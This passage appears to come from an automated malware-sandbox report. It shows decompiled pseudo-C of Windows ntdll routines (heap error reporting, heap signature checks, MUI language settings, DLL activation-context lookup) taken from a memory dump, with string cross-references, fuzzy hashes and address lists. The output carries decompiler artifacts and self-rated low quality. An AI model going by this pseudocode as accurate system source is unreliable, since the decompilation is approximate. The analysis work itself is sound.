a NULL pointer, xrefs: 0105B4E0
The instruction at %p tried to %s , xrefs: 0105B4B6
write to, xrefs: 0105B4A6
The resource is owned exclusively by thread %p, xrefs: 0105B374
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B3D6

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
Instruction ID: 70dc9f0838b235415b18b231182e80a55936f45ab5f8c804b2561412aa22f7e6
Opcode Fuzzy Hash: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
Instruction Fuzzy Hash: 54811535A00200FFEF666A099C46EBB3F6AEF96B55F404084F9842B162D761E451EB73

Uniqueness

Uniqueness Score: -1.00%

Function 01061C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01061C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xf848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x109589c);
				E00FAB150("Heap error detected at %p (heap handle %p)\n",  *0x10958a0);
				_t27 =  *0x1095898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01061E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FAB150("Error code: %d - %s\n",  *0x1095898);
				_t113 =  *0x10958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter1: %p\n",  *0x10958a4);
				}
				_t115 =  *0x10958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter2: %p\n",  *0x10958a8);
				}
				_t117 =  *0x10958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter3: %p\n",  *0x10958ac);
				}
				_t119 =  *0x10958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10958b4);
					E00FAB150("Last known valid blocks: before - %p, after - %p\n",  *0x10958b0);
				} else {
					_t120 =  *0x10958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FAB150("Stack trace available at %p\n", 0x10958c0);
			}

0x01061c10
0x01061c16
0x01061c1e
0x01061c3d
0x01061c3e
0x01061c20
0x01061c35
0x01061c3a
0x01061c44
0x01061c55
0x01061c5a
0x01061c65
0x01061c67
0x00000000
0x01061c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01061c67
0x01061cdc
0x01061ce5
0x01061d04
0x01061d05
0x01061ce7
0x01061cfc
0x01061d01
0x01061d0b
0x01061d17
0x01061d1f
0x01061d25
0x01061d30
0x01061d4f
0x01061d50
0x01061d32
0x01061d47
0x01061d4c
0x01061d61
0x01061d67
0x01061d68
0x01061d6e
0x01061d79
0x01061d98
0x01061d99
0x01061d7b
0x01061d90
0x01061d95
0x01061daa
0x01061db0
0x01061db1
0x01061db7
0x01061dc2
0x01061de1
0x01061de2
0x01061dc4
0x01061dd9
0x01061dde
0x01061df3
0x01061df9
0x01061dfa
0x01061e00
0x01061e0a
0x01061e13
0x01061e32
0x01061e33
0x01061e15
0x01061e2a
0x01061e2f
0x01061e39
0x01061e4a
0x01061e02
0x01061e02
0x01061e08
0x00000000
0x00000000
0x01061e08
0x01061e5b
0x01061e7a
0x01061e7b
0x01061e5d
0x01061e72
0x01061e77
0x01061e95

Strings

heap_failure_invalid_argument, xrefs: 01061CAD
heap_failure_buffer_overrun, xrefs: 01061C98
Error code: %d - %s, xrefs: 01061D12
Heap error detected at %p (heap handle %p), xrefs: 01061C50
Parameter1: %p, xrefs: 01061D5C
HEAP: , xrefs: 01061C16, 01061C3D, 01061D04, 01061D4F, 01061D98, 01061DE1, 01061E32, 01061E7A
heap_failure_freelists_corruption, xrefs: 01061CC9
Last known valid blocks: before - %p, after - %p, xrefs: 01061E45
heap_failure_usage_after_free, xrefs: 01061CBB
heap_failure_internal, xrefs: 01061C6E
heap_failure_buffer_underrun, xrefs: 01061C9F
HEAP[%wZ]: , xrefs: 01061C30, 01061CF7, 01061D42, 01061D8B, 01061DD4, 01061E25, 01061E6D
heap_failure_listentry_corruption, xrefs: 01061CD0
Parameter3: %p, xrefs: 01061DEE
heap_failure_unknown, xrefs: 01061C75
heap_failure_invalid_allocation_type, xrefs: 01061CB4
heap_failure_virtual_block_corruption, xrefs: 01061C91
heap_failure_lfh_bitmap_mismatch, xrefs: 01061CD7
heap_failure_block_not_busy, xrefs: 01061CA6
Parameter2: %p, xrefs: 01061DA5
heap_failure_cross_heap_operation, xrefs: 01061CC2
heap_failure_multiple_entries_corruption, xrefs: 01061C8A
heap_failure_generic, xrefs: 01061C7C
heap_failure_entry_corruption, xrefs: 01061C83
Stack trace available at %p, xrefs: 01061E86

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
Instruction ID: 544a948ebb63d8e139dfe31963356b59c7459711c1a87240bd9768d353fbec88
Opcode Fuzzy Hash: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
Instruction Fuzzy Hash: 9F61C536925144DFE711EB49ECA5D2973ECEB44B30B09807AF549AF353C639D840EB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FB3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FB1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FB1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FB1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FB1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FB1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00FC4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00FEF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00FF1370(_t276, 0xf84e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00FEBB40(0,  &_v68, _t170);
									if(L00FB43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00FEBB40(_t257,  &_v68, _t243);
								if(L00FB43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00FF1370(_t278, 0xf84e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00FC4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00FEF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00FF1370(_v16, 0xf84e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00FEBB40(_t262,  &_v68, _t244);
								if(L00FB43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00FF1370(_t282, 0xf84e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00FEBB40(_t262,  &_v68, _t201);
							if(L00FB43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00FC4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00FEF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00FF1370(_t280, 0xf84e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00FEBB40(_t267,  &_v68, _t245);
							if(L00FB43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00FF1370(_t284, 0xf84e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00FEBB40(_t267,  &_v68, _t224);
						if(L00FB43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00fb3d3c
0x00fb3d42
0x00fb3d44
0x00fb3d46
0x00fb3d49
0x00fb3d4c
0x00fb3d4f
0x00fb3d52
0x00fb3d55
0x00fb3d58
0x00fb3d5b
0x00fb3d5f
0x00fb3d61
0x00fb3d66
0x01008213
0x01008218
0x00fb4085
0x00fb4088
0x00fb408e
0x00fb4094
0x00fb409a
0x00fb40a0
0x00fb40a6
0x00fb40a9
0x00fb40af
0x00fb40b6
0x00fb40bd
0x00fb40bd
0x00fb3d83
0x0100821f
0x01008229
0x01008238
0x01008238
0x0100823d
0x0100823d
0x00fb3da0
0x00fb3daf
0x00fb3db5
0x00fb3dba
0x00fb3dba
0x00fb3dd4
0x00fb3e94
0x00fb3eab
0x00fb3f6d
0x00fb3f84
0x00fb406b
0x00fb406b
0x00fb406e
0x00fb406e
0x00fb4070
0x00fb4074
0x01008351
0x01008351
0x00fb407a
0x00fb407f
0x0100835d
0x01008370
0x01008377
0x01008379
0x0100837c
0x0100837c
0x0100835d
0x00000000
0x00fb407f
0x00fb3f8a
0x00fb3f8d
0x00fb3f90
0x00fb3f95
0x0100830d
0x0100830f
0x00fb3f9b
0x00fb3fac
0x00fb3fae
0x00fb3fb1
0x00fb3fb1
0x00fb3fb6
0x01008317
0x0100831a
0x00000000
0x00fb3fbc
0x00fb3fc1
0x00fb3fc9
0x00fb3fd7
0x00fb3fda
0x00fb3fdd
0x00fb4021
0x00fb4021
0x00fb4029
0x00fb4030
0x00fb4044
0x00fb4046
0x00fb4046
0x00fb4044
0x00fb4049
0x01008327
0x01008334
0x01008339
0x0100833c
0x00fb404f
0x00fb404f
0x00fb404f
0x00fb4051
0x00fb4056
0x00fb4063
0x00fb4063
0x00fb4068
0x00000000
0x00fb4068
0x00fb3fdf
0x00fb3fe2
0x00fb3fe4
0x00fb3fe7
0x00fb3fef
0x00fb4003
0x00fb4005
0x00fb4005
0x00fb400c
0x00fb4013
0x00fb4016
0x00fb4017
0x00fb401b
0x00fb401e
0x00000000
0x00fb401e
0x00fb3fb6
0x00fb3eb1
0x00fb3eb4
0x00fb3eb7
0x00fb3ebc
0x010082a9
0x010082ab
0x00fb3ec2
0x00fb3ed3
0x00fb3ed5
0x00fb3ed8
0x00fb3ed8
0x00fb3edd
0x010082b3
0x010082b6
0x00000000
0x00fb3ee3
0x00fb3ee8
0x00fb3eed
0x00fb3ef0
0x00fb3ef3
0x00fb3f02
0x00fb3f05
0x00fb3f08
0x010082c0
0x010082c3
0x010082c5
0x010082c8
0x010082d0
0x010082e4
0x010082e6
0x010082e6
0x010082ed
0x010082f4
0x010082f7
0x010082f8
0x010082fc
0x010082ff
0x010082ff
0x00fb3f0e
0x00fb3f11
0x00fb3f16
0x00fb3f1d
0x00fb3f31
0x01008307
0x01008307
0x00fb3f31
0x00fb3f39
0x00fb3f48
0x00fb3f4d
0x00fb3f50
0x00fb3f50
0x00fb3f53
0x00fb3f58
0x00fb3f65
0x00fb3f65
0x00fb3f6a
0x00000000
0x00fb3f6a
0x00fb3edd
0x00fb3dda
0x00fb3ddd
0x00fb3de0
0x00fb3de5
0x01008245
0x00fb3deb
0x00fb3df7
0x00fb3dfc
0x00fb3dfe
0x00fb3e01
0x00fb3e01
0x00fb3e06
0x0100824d
0x0100824f
0x01008254
0x00000000
0x00fb3e0c
0x00fb3e11
0x00fb3e16
0x00fb3e19
0x00fb3e29
0x00fb3e2c
0x00fb3e2f
0x0100825c
0x0100825f
0x01008261
0x01008264
0x0100826c
0x01008280
0x01008282
0x01008282
0x01008289
0x01008290
0x01008293
0x01008294
0x01008298
0x0100829b
0x0100829b
0x00fb3e35
0x00fb3e38
0x00fb3e3d
0x00fb3e44
0x00fb3e58
0x010082a3
0x010082a3
0x00fb3e58
0x00fb3e60
0x00fb3e6f
0x00fb3e74
0x00fb3e77
0x00fb3e77
0x00fb3e7a
0x00fb3e7f
0x00fb3e8c
0x00fb3e8c
0x00fb3e91
0x00000000
0x00fb3e91

Strings

WindowsExcludedProcs, xrefs: 00FB3D6F
Kernel-MUI-Language-SKU, xrefs: 00FB3F70
Kernel-MUI-Language-Disallowed, xrefs: 00FB3E97
Kernel-MUI-Number-Allowed, xrefs: 00FB3D8C
Kernel-MUI-Language-Allowed, xrefs: 00FB3DC0

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
Instruction ID: b1bcd092ca4e9cdb20b586833fd2774826d7119a80d1b59648492cdd7ebb2e39
Opcode Fuzzy Hash: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
Instruction Fuzzy Hash: 12F14C72D00659EBCB11DF99C981AEEBBB9FF48750F14406AE505A7251E734AE00EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00FA40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00FAB150(", passed to %s", _t29);
					}
					_push("\n");
					E00FAB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1096378 = 1;
						asm("int3");
						 *0x1096378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00fa40e6
0x00fa40e8
0x00fa40f1
0x0100042d
0x0100044c
0x01000451
0x0100042f
0x01000444
0x01000449
0x0100045d
0x01000466
0x0100046e
0x01000474
0x01000475
0x0100047a
0x0100048a
0x0100048c
0x01000493
0x01000494
0x01000494
0x00000000
0x0100049b
0x00000000

Strings

HEAP: , xrefs: 0100044C
, passed to %s, xrefs: 01000469
Invalid heap signature for heap at %p, xrefs: 01000458
HEAP[%wZ]: , xrefs: 0100043F
RtlAllocateHeap, xrefs: 01000468

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 64afc1e7e721fb895546d6fd10310c4319e1cf0ea7f1b43ab8c86f26ac504cb3
Instruction ID: b5ac5d1eb785555c5b3a64aa0e3c93eb3ab94e98b749571d9ea8880dc95fecef
Opcode Fuzzy Hash: 64afc1e7e721fb895546d6fd10310c4319e1cf0ea7f1b43ab8c86f26ac504cb3
Instruction Fuzzy Hash: 890140721085409EE22A6768E85EF9277E8DB41B70F158059F005876D3CFADD440E315

Uniqueness

Uniqueness Score: -1.00%

Function 00FD8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00FD8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x109d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1098464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1095780 & 0x00000003) != 0) {
							E01025510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1095780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00FEB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1097984; // 0xb42c00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1098464; // 0x74790110
					 *0x109b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00FD9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1095780 & 0x00000005) != 0) {
						_push(_t49);
						E01025510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00fd8e0f
0x00fd8e16
0x00fd8e19
0x00fd8e1b
0x00fd8e21
0x00fd8e7f
0x00fd8e85
0x01019354
0x0101936c
0x01019371
0x0101937b
0x01019381
0x01019381
0x0101937b
0x00fd8e9d
0x00fd8e9d
0x00fd8e29
0x00fd8e2c
0x00fd8e38
0x00fd8e3e
0x00fd8e43
0x00fd8eb5
0x00fd8eb9
0x010192aa
0x010192af
0x010192e8
0x010192e8
0x010192af
0x00fd8eb9
0x00fd8e45
0x00fd8e53
0x00fd8e5b
0x00fd8e5f
0x00fd8e78
0x00fd8e78
0x00fd8e7d
0x00fd8ec3
0x00fd8ecd
0x00fd8ed2
0x00fd8ed2
0x00fd8ec5
0x00fd8ec5
0x00000000
0x00fd8e7d
0x00fd8e67
0x00fd8ea4
0x0101931a
0x00000000
0x00000000
0x01019320
0x00fd8ea4
0x00fd8e70
0x01019325
0x01019340
0x01019345
0x01019345
0x00fd8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0101932A
LdrpFindDllActivationContext, xrefs: 01019331, 0101935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01019357
minkernel\ntdll\ldrsnap.c, xrefs: 0101933B, 01019367

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
Instruction ID: 99dde20f045b4827b66ad037982da1c6eed9af279952caa784e184b07f281229
